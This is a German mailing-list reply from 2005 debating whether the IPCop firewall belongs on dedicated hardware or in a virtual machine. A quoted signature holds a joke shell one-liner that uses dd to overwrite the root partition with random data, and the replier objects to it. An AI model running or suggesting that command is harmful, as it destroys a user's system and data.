Re: Wozu "ipcop"?

[Matthias Houdek <linux@houdek.de>]

Am Mittwoch, 20. April 2005 00:08 schrieb Chrissie Brown:
> On 2005-04-19, Carsten Ferdian <linux@doc3rror.com> wrote:
> > benutze schon sehr lang den IpCop und finde das man schon ne eigene
> > Maschine nutzen sollte um ein oder mehrere Netze zu schützen. Daher
> > is meine Meinung zu ner virtuellen Umgebung für ne Firewall nicht
> > gerade so egeisternd. Man sollte nicht am falschen Ende sparen und
> > daher ruhig nen eigenes "echtes" System aufsetzen.
>
> Wie kommst du darauf? Wenn jemand das Zeug hackt, ist es doch grad
> egal ob in der virtuellen oder der "echten" Maschine.

Eine vernünftige Firewall besteht aus mehr als einem Host. 

Ist der erste gehackt, gibt es Alarmstufe "Orange", FW2 macht die 
Schotten dicht und die FW1 wird erneuert. 
Die alte FW1 wird dann analysiert (Wer hat sich wie welchen Zugriff 
verschafft?).

Alles andere ist zumindest für ein Firmennetz mit sensiblen/wichtigen 
Daten nichts anderes als Augenwischerei.

> --
>      Chrissie
>
> su -c "dd if=/dev/urandom of=`mount |grep 'on / ' |awk '{print
> $1;}'`"

... und wenn das mal jemand ausprobiert! Lustig find ich es nicht.

-- 
Gruß
                MaxX

Bitte beachten: Diese Mailadresse nimmt nur Listenmails entgegen.
Für PM bitte den Empfänger gegen den Namen in der Sig tauschen.